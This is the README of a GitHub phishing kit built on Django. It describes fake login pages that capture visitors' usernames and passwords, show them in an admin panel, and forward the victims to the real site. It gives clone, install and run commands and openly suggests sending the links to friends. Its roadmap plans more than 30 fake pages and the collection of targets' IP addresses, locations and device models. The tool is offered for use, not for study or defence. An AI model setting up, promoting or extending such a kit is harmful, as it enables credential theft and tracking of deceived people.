This site has 4 fake pages that I will add to other pages in the future. You can run this site on your host and send links to its pages to your friends After entering the username and password on the fake page, the user will be transferred to the main site and you can see their username and password on the main page after logging in to the admin panel.
clone the project
git clone https://github.com/Cmatrix1/Fake-Page-Django/
install the django 3.2
pip install django==3.2
First of all Create the superuser
python manage.py createsuperuser
runserver !
python manage.py runserver
and login in Django admin go to
http://127.0.0.1:8000/admin
next go to main page :)
http://127.0.0.1:8000
I need your support to add these features. Please support me by giving stars and sharing this source with your friends.
- َAdd more than 30 pages
- The ability to create accounts for users and make fake pages
- The ability to see the target IP
- The ability to see the approximate location of the target
- The ability to see the model of the user's device
- and more ...